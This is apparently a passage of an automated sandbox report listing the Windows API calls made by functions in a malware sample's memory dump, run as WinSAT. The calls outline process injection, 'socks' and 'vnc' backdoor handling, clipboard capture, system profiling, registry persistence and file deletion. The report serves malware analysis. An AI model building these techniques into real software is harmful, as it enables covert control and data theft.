Part of subcall function 01D20AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01D20C93
Part of subcall function 01D20AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01D20CA6
Part of subcall function 01D20AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01D20CB5

Part of subcall function 01D29B3E: CreateMutexW.KERNEL32(Function_00022C30,00000000,01D33F40,?,?,?,01D179E5), ref: 01D29B66

Strings

, xrefs: 01D21301

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2D325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 01D22828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01D228A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 01D2D34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 01D2D35D

Part of subcall function 01D2C86B: SetEvent.KERNEL32(01D2D36D,00000000), ref: 01D2C871
Part of subcall function 01D2C86B: WaitForSingleObject.KERNEL32(000002B0,000000FF), ref: 01D2C884

Part of subcall function 01D1BCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 01D1BCEC
Part of subcall function 01D1BCAF: Sleep.KERNEL32(000001F4), ref: 01D1BCFB
Part of subcall function 01D1BCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 01D1BD11

Part of subcall function 01D28A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 01D28A5A
Part of subcall function 01D28A29: FindNextFileW.KERNEL32(00000000,?), ref: 01D28AB5
Part of subcall function 01D28A29: FindClose.KERNEL32(00000000), ref: 01D28AC0
Part of subcall function 01D28A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 01D28ACC
Part of subcall function 01D28A29: RemoveDirectoryW.KERNEL32(?), ref: 01D28AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 01D2D39B
CharToOemW.USER32(?,?), ref: 01D2D3B7
CharToOemW.USER32(?,?), ref: 01D2D3C6

Part of subcall function 01D240F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 01D2410D

ExitProcess.KERNEL32(00000000), ref: 01D2D41C

Part of subcall function 01D24E7B: CharToOemW.USER32(?,?), ref: 01D24EAB
Part of subcall function 01D24E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 01D24F2F

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D27AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 01D27B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 01D27B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 01D27B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01D27B72
GetWindowLongW.USER32(?,000000F0), ref: 01D27B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 01D27B9D

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D285D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 01D285F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28608
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 01D28648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28662
CloseHandle.KERNEL32(?), ref: 01D2866B

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D15A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 01D15B1C

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

TlsGetValue.KERNEL32 ref: 01D15AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 01D15AD4
SaveDC.GDI32(?), ref: 01D15AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 01D15AF4
RestoreDC.GDI32(?,00000000), ref: 01D15B06

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D24660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(01D28C87,00000000,00000000,00000001,F0000040,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D24679
CryptCreateHash.ADVAPI32(01D28C87,00008003,00000000,00000000,00000030,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D24691
CryptHashData.ADVAPI32(00000030,00000010,01D28C87,00000000,?,01D28C87), ref: 01D246AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,01D28C87), ref: 01D246C5
CryptDestroyHash.ADVAPI32(00000030,?,01D28C87), ref: 01D246DC
CryptReleaseContext.ADVAPI32(01D28C87,00000000,?,01D28C87,?,00000030,?,?,?,01D291A0,01D33EC0), ref: 01D246E6

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D16010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 01D1610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 01D161E6

Part of subcall function 01D170A6: GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 01D170CA
Part of subcall function 01D170A6: GetNativeSystemInfo.KERNEL32(?), ref: 01D170D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 01D16162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 01D161A4

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D234BD: GetSystemTime.KERNEL32(?,?,?,01D160C8,00000000,000000FF,00000000), ref: 01D234C7
Part of subcall function 01D234BD: SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,01D160C8,00000000,000000FF,00000000), ref: 01D234D5

Part of subcall function 01D234E5: GetTimeZoneInformation.KERNEL32(?), ref: 01D234F4

Strings

, xrefs: 01D16218

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D17125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 01D17138

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 01D171C0

Part of subcall function 01D274DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01D17194,?,?,00000104,.exe,00000000), ref: 01D274F4
Part of subcall function 01D274DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01D17194,?,?,00000104), ref: 01D27575

PathUnquoteSpacesW.SHLWAPI(?), ref: 01D171A0
ExpandEnvironmentStringsW.KERNEL32(?,01D2D23A,00000104), ref: 01D171AD

Strings

.exe, xrefs: 01D17147

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D24F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 01D24FA6
InternetSetOptionA.WININET(00000000,00000002,01D3200C,00000004), ref: 01D24FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01D24FE2
InternetCloseHandle.WININET(00000000), ref: 01D24FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 01D24F97, 01D24FA5

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D25403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 01D25414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 01D25427
FreeLibrary.KERNEL32(?), ref: 01D25479

Strings

urlmon.dll, xrefs: 01D2540D
ObtainUserAgentString, xrefs: 01D25421

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 01D174BE
lstrcmpiA.KERNEL32(?,vnc), ref: 01D174D1

Part of subcall function 01D27425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01D27444
Part of subcall function 01D27425: CloseHandle.KERNEL32(?), ref: 01D27450

Part of subcall function 01D27477: SetLastError.KERNEL32(0000009B,01D22AC8,00000000,01D1BB5F,00000000,01D32AF0,00000000,00000104,76C605D7,00000000), ref: 01D27481
Part of subcall function 01D27477: CreateThread.KERNEL32(00000000,01D32AF0,01D32AF0,01D32AF0,00000000,00000000), ref: 01D274A4

Part of subcall function 01D2675E: shutdown.WS2_32(?,00000002), ref: 01D26766
Part of subcall function 01D2675E: #3.WS2_32(?), ref: 01D2676D

Part of subcall function 01D274BC: WaitForMultipleObjects.KERNEL32(?,01D32AEC,00000001,000000FF), ref: 01D274CE

CloseHandle.KERNEL32(?), ref: 01D176EE

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D26B8E: ReleaseMutex.KERNEL32(00000000,01D23021,?,?,?), ref: 01D26B92

Part of subcall function 01D26444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 01D26463
Part of subcall function 01D26444: freeaddrinfo.WS2_32(?,?,?,?,?,01D17284,?), ref: 01D264B0

Part of subcall function 01D267B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 01D267CC

Part of subcall function 01D26774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 01D267A7

Part of subcall function 01D2666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 01D266EA
Part of subcall function 01D2666B: WSASetLastError.WS2_32(0000274C), ref: 01D266F9

Part of subcall function 01D2636E: recv.WS2_32(?,?,00000001,00000000), ref: 01D26392

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

Strings

socks, xrefs: 01D174B7
vnc, xrefs: 01D174CA

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D19D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 01D19E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 01D19E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 01D19ED7

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D27607: RegQueryValueExW.KERNEL32(?,?,00000000,?,01D29E26,?,?,?,01D275CD,?,?,00000000,00000004,?), ref: 01D2761F
Part of subcall function 01D27607: RegCloseKey.KERNEL32(?,?,01D275CD,?,?,00000000,00000004,?,?,?,?,01D29E26,?,?), ref: 01D2762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 01D19F7A
RegCloseKey.ADVAPI32(?), ref: 01D19F8D

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D274DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01D17194,?,?,00000104,.exe,00000000), ref: 01D274F4
Part of subcall function 01D274DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01D17194,?,?,00000104), ref: 01D27575

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D18E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01D18E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 01D18F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 01D18F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 01D18F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 01D18F7B

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D29224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 01D29245

Part of subcall function 01D286EF: GetFileSizeEx.KERNEL32(01D2925C,01D2925C,?,?,?,01D2925C,00000000), ref: 01D286FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 01D29286
CloseHandle.KERNEL32(?), ref: 01D29292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 01D29301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 01D29327

Part of subcall function 01D2869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 01D286B1

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D29959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

GetDIBits.GDI32(00000000,01D1DE4B,00000000,00000001,00000000,00000000,00000000), ref: 01D29991
GetDIBits.GDI32(00000000,01D1DE4B,00000000,00000001,00000000,00000000,00000000), ref: 01D299A7
DeleteObject.GDI32(01D1DE4B), ref: 01D299B4
CreateDIBSection.GDI32(00000000,00000000,00000000,01D32888,?,?), ref: 01D29A24

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

DeleteObject.GDI32(01D1DE4B), ref: 01D29A43

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2B3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01D2B437
WriteFile.KERNEL32(01D2B3D4,?,00000146,?,00000000), ref: 01D2B475
WriteFile.KERNEL32(01D2B3D4,?,00000000,?,00000000), ref: 01D2B499
FlushFileBuffers.KERNEL32(01D2B3D4), ref: 01D2B4AD
CloseHandle.KERNEL32(01D2B3D4), ref: 01D2B4B6

Part of subcall function 01D28716: SetFileAttributesW.KERNEL32(00000080,00000080,01D2B4CD,?), ref: 01D2871F
Part of subcall function 01D28716: DeleteFileW.KERNEL32(?), ref: 01D28729

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2C49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

GetProcessId.KERNEL32(?), ref: 01D2C509

Part of subcall function 01D2245B: CreateMutexW.KERNEL32(01D32C30,00000001,?,01D32E70,76C605D7,?,00000002,?,76C605D7), ref: 01D224A3
Part of subcall function 01D2245B: GetLastError.KERNEL32 ref: 01D224AF
Part of subcall function 01D2245B: CloseHandle.KERNEL32(00000000), ref: 01D224BD

Part of subcall function 01D22542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 01D22574
Part of subcall function 01D22542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01D2316D,?,00000000,?,?,00000000), ref: 01D225AB
Part of subcall function 01D22542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01D2316D,?,00000000,?,?,00000000), ref: 01D225CB
Part of subcall function 01D22542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,01D2316D,?,00000000), ref: 01D2261A

GetThreadContext.KERNEL32 ref: 01D2C557
SetThreadContext.KERNEL32(00000000,00000000), ref: 01D2C596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 01D2C5AD
CloseHandle.KERNEL32(?), ref: 01D2C5B7

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D15DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 01D15E1A
IntersectRect.USER32(?,?), ref: 01D15E58
IsRectEmpty.USER32(?), ref: 01D15E6A
IntersectRect.USER32(?,?), ref: 01D15E81

Part of subcall function 01D15C8A: GetWindowThreadProcessId.USER32(?,?), ref: 01D15CB4
Part of subcall function 01D15C8A: ResetEvent.KERNEL32(00000010), ref: 01D15D03
Part of subcall function 01D15C8A: PostMessageW.USER32(?,?,?,00000010), ref: 01D15D26
Part of subcall function 01D15C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 01D15D35
Part of subcall function 01D15C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 01D15D60
Part of subcall function 01D15C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 01D15D70
Part of subcall function 01D15C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 01D15D82
Part of subcall function 01D15C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 01D15DA7
Part of subcall function 01D15C8A: IntersectRect.USER32(?,?), ref: 01D15DC7
Part of subcall function 01D15C8A: FillRect.USER32(?,?,00000006), ref: 01D15DD9
Part of subcall function 01D15C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 01D15DED

GetTopWindow.USER32(?), ref: 01D15EB1

Part of subcall function 01D27AC1: GetWindow.USER32(?,00000001), ref: 01D27AE3

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1BBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 01D1BBE0
SetThreadPriority.KERNEL32(00000000), ref: 01D1BBE7

Part of subcall function 01D22507: CreateMutexW.KERNEL32(01D32C30,00000000,?,?,?,?,?), ref: 01D22528

Part of subcall function 01D22828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01D228A1

PathQuoteSpacesW.SHLWAPI(?), ref: 01D1BC2A

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

WaitForSingleObject.KERNEL32(000000C8), ref: 01D1BC62

Part of subcall function 01D2763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,01D29EAB,?,?,00000004), ref: 01D27658
Part of subcall function 01D2763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,01D29EAB,?,?,01D29EAB,?,?,00000004,?,00000004), ref: 01D27672
Part of subcall function 01D2763A: RegCloseKey.ADVAPI32(00000004,?,?,01D29EAB,?,?,00000004,?,00000004), ref: 01D27681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 01D1BC98

Part of subcall function 01D26B8E: ReleaseMutex.KERNEL32(00000000,01D23021,?,?,?), ref: 01D26B92

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2B062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 01D2B06B

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

GlobalLock.KERNEL32(00000000), ref: 01D2B09F
EnterCriticalSection.KERNEL32(01D33FB4,00000000,00000000), ref: 01D2B0DF

Part of subcall function 01D2AD5F: EnterCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AD7C
Part of subcall function 01D2AD5F: LeaveCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AD9D
Part of subcall function 01D2AD5F: EnterCriticalSection.KERNEL32(01D33FB4,?,?,?,?,01D2B052,?), ref: 01D2ADAE
Part of subcall function 01D2AD5F: LeaveCriticalSection.KERNEL32(01D33FB4,?,?,?,01D2B052,?), ref: 01D2AE47

LeaveCriticalSection.KERNEL32(01D33FB4,00000000,01D14A68), ref: 01D2B0F6

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

GlobalUnlock.KERNEL32(?), ref: 01D2B109

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D268E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 01D268F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 01D2691C
WSAGetLastError.WS2_32 ref: 01D26923

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01D2694F

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

#3.WS2_32(?), ref: 01D26963

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D28A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 01D28A5A

Part of subcall function 01D28716: SetFileAttributesW.KERNEL32(00000080,00000080,01D2B4CD,?), ref: 01D2871F
Part of subcall function 01D28716: DeleteFileW.KERNEL32(?), ref: 01D28729

FindNextFileW.KERNEL32(00000000,?), ref: 01D28AB5
FindClose.KERNEL32(00000000), ref: 01D28AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 01D28ACC
RemoveDirectoryW.KERNEL32(?), ref: 01D28AD3

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D15A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 01D15A88

Part of subcall function 01D2262D: WaitForSingleObject.KERNEL32(00000000,01D1BC3F), ref: 01D22635

TlsGetValue.KERNEL32 ref: 01D15A21
SaveDC.GDI32(?), ref: 01D15A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 01D15A61
RestoreDC.GDI32(?,00000000), ref: 01D15A73

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D15BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,01D230F6), ref: 01D15C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,01D230F6), ref: 01D15C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,01D230F6), ref: 01D15C1C

Part of subcall function 01D154A9: GetWindowInfo.USER32(?,?), ref: 01D15515
Part of subcall function 01D154A9: IntersectRect.USER32(?,?,-00000114), ref: 01D15538
Part of subcall function 01D154A9: IntersectRect.USER32(?,?,-00000114), ref: 01D1558E
Part of subcall function 01D154A9: GetDC.USER32(00000000), ref: 01D155D2
Part of subcall function 01D154A9: CreateCompatibleDC.GDI32(00000000), ref: 01D155E3
Part of subcall function 01D154A9: ReleaseDC.USER32(00000000,00000000), ref: 01D155ED
Part of subcall function 01D154A9: SelectObject.GDI32(00000000,?), ref: 01D15602
Part of subcall function 01D154A9: DeleteDC.GDI32(00000000), ref: 01D15610
Part of subcall function 01D154A9: TlsSetValue.KERNEL32(?), ref: 01D1565B
Part of subcall function 01D154A9: EqualRect.USER32(?,?), ref: 01D15675
Part of subcall function 01D154A9: SaveDC.GDI32(00000000), ref: 01D15680
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D1569B
Part of subcall function 01D154A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 01D156BB
Part of subcall function 01D154A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 01D156CD
Part of subcall function 01D154A9: RestoreDC.GDI32(00000000,?), ref: 01D156E4
Part of subcall function 01D154A9: SaveDC.GDI32(00000000), ref: 01D15706
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01D1571C
Part of subcall function 01D154A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01D15735
Part of subcall function 01D154A9: RestoreDC.GDI32(00000000,?), ref: 01D15743
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01D15756
Part of subcall function 01D154A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01D15766
Part of subcall function 01D154A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01D15778
Part of subcall function 01D154A9: TlsSetValue.KERNEL32(00000000), ref: 01D15792
Part of subcall function 01D154A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D157B2
